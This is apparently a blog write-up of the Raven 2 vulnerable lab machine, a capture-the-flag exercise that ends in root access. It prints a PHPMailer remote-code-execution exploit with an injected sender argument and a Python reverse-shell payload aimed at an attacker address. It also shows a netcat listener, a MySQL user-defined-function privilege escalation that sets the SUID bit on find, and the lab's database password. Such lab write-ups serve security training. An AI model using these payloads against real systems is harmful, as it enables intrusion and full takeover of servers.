Lab – Raven 2

This Friday lab is dedicated to one my favorite writers. But it’s just a coincidence =) #cissp #security #pentest

Raven 2 is another vulnerable intermediate level machine by William McCann. The only difference here that it has four flags to capture.  Let’s dive right in! 

Virtual machine boots and all we got is this login screen:

raven_01

But there’s nothing to see here. Now to enumeration:

root@kali:~# nmap -sV -sC -O -A -p- 192.168.89.129
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 01:56 EDT
Nmap scan report for 192.168.89.129
Host is up (0.00091s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41532/tcp status
|_ 100024 1 51159/udp status
41532/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:71:58:DE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.91 ms 192.168.89.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.89 seconds

Kinda standard – SSH for a remote administration and HTTP for a web server. There’s also some RPC application, but it doesn’t look promising. Let’s look at a web page:

raven_02

This is an another empty blog. There are several links here and there, but nothing too interesting. Nobody does anything from scratch nowdays, so let’s look a little closer:

root@kali:~# dirb http://192.168.89.129

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 15 02:12:57 2019
URL_BASE: http://192.168.89.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.89.129/ ----
==> DIRECTORY: http://192.168.89.129/css/
==> DIRECTORY: http://192.168.89.129/fonts/
==> DIRECTORY: http://192.168.89.129/img/
+ http://192.168.89.129/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://192.168.89.129/js/
==> DIRECTORY: http://192.168.89.129/manual/
+ http://192.168.89.129/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.89.129/vendor/
==> DIRECTORY: http://192.168.89.129/wordpress/

This is our old friend WordPress. Are there any websites not powered by WordPress out there now? =)  We’ll get to it later, but now let’s go to vendor directory:

raven_04

You can notice that there’s a phpmailer here, but one file for some reason has a different modification date. Let’s take a look at PATH:

/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

Oh, great, our first flag. Let’s also check the phpmailer version:

5.2.16

It’s very dated so I guess we’ll find something useful with a searchsploit. Let’s pick this one:

PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py

It’s a python script, but we have modify it. We have to specify a target IP with a script name. Also we need to add a script name for our backdoor that we’re going to upload:

target = 'http://192.168.89.129/contact.php'
backdoor = '/shell.php'

This script creates a reverse shell, we must select a port we’re going to listen:

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.89.150\\\',4444));os.dup2(s.fileno(),0);os.du$
fields={'action': 'submit',
'name': payload,
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',

Ok, everything is set, let’s run a script. I’ve got some error because of a missing python module, but it’s fixable with a single command:

root@kali:~# pip install requests-toolbelt

Scirpt worked

root@kali:~# python 40974.py
[+] SeNdiNG eVIl SHeLL To TaRGeT....
[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D
[+] ExPLoITeD http://192.168.89.129/contact.php

And now we have to start listening on port 4444 and run shell.php from web server.

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
192.168.89.129: inverse host lookup failed: Unknown host
connect to [192.168.89.150] from (UNKNOWN) [192.168.89.129] 51711
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")';
www-data@Raven:/var/www/html$ uname -a
uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
www-data@Raven:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ok, we’re in. Let’s look around a little:

www-data@Raven:/var/www/html$ ls
ls
Security - Doc contact.zip fonts js shell.php wordpress
about.html css img scss team.html
contact.php elements.html index.html service.html vendor
www-data@Raven:/var/www/html$ cd ..
cd ..
www-data@Raven:/var/www$ ls
ls
flag2.txt html
www-data@Raven:/var/www$ cat flag2.txt
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}

Now it’s time for a privilege escalation. First, let’s check if something improper runs under root account:

www-data@Raven:/var/www/html/wordpress$ ps aux | grep root

root 927 0.1 10.6 617956 52176 ? Sl 16:17 0:08 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306

This time it’s MySQL. Great. Let’s also run privilege checker script to speed things up:

www-data@Raven:/var/www/html/wordpress$ wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

Among other things it also suggests that we should go for MySQL since it’s an easy target here:

- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

Let’s grab the exploit and follow the instruction. First of all, we have to compile the script. There’s no way we can do it on a target machine, so we’ll work on our Kali box.

root@kali:~# gcc -g -c 1518.c 
root@kali:~# gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc

We’ve got our working exploit, but we have to deliver it to a target machine somehow. The common tactics here is to bring up python web server and to download it from there:

root@kali:~# python -m SimpleHTTPServer 80

And now download it from target machine (we still got a shell there, right?)

www-data@Raven:/tmp$ wget 192.168.89.150/1518.so

Let’s also make sure, that it is executable:

www-data@Raven:/tmp$ chmod 777 1518.so

Ok, we’re following the exploit instruction and the next point is to connect to a MySQL server. Luckily, we’ve got WordPress here, so we can grab login and password from wp-config.php:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

Let’s connect with there credentials:

$ mysql -Dmysql -uroot -p'R@v3nSecurity'
mysql -Dmysql -uroot -p'R@v3nSecurity'
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 40
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Let’s follow the instruction further and run all the necessary commands:

mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)

mysql> insert into foo values(load_file('/tmp/1518.so'));
insert into foo values(load_file('/tmp/1518.so'));
Query OK, 1 row affected (0.02 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugins/1518.so';
select * from foo into dumpfile '/usr/lib/mysql/plugins/1518.so';
ERROR 1 (HY000): Can't create/write to file '/usr/lib/mysql/plugins/1518.so' (Errcode: 2)
mysql> select * from foo into dumpfile '/usr/lib/mysql/1518/so';
select * from foo into dumpfile '/usr/lib/mysql/1518/so';
ERROR 1 (HY000): Can't create/write to file '/usr/lib/mysql/1518/so' (Errcode: 2)
mysql> select * from foo into dumpfile '/tmp/tmp/1518.so';
select * from foo into dumpfile '/tmp/tmp/1518.so';
ERROR 1 (HY000): Can't create/write to file '/tmp/tmp/1518.so' (Errcode: 2)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname '1518.so';
create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.01 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit
exit
Bye
$ touch foo
touch foo
$ find foo -exec "/bin/sh" \;
find foo -exec "/bin/sh" \;
# whoami
whoami
root

This is it, we have a full access here. Now we have to find last two flags. One of them is in the root directory:

cd /root
# ls
ls
flag4.txt
# cat flag4.txt
___ ___ ___
| _\__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|

flag4{df2bc5e951d91581467bb9a2a8ff4425}

CONGRATULATIONS on successfully rooting RavenII

I hope you enjoyed this second interation of the Raven VM

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io

One more to go. There’s a neat trick to find the last flag. Since all the flag files are named in a similar way, we’ll search the whole machine for this pattern:

# find / -name 'flag*'
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/var/www/flag2.txt
/root/flag4.txt
/usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags

It seems that the last flag is in png format among wordpress uploads. We can get it with a browser.

raven_05

All four flags are here and it means that we owned Raven machine. 

Then the bird said “Nevermore”!

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s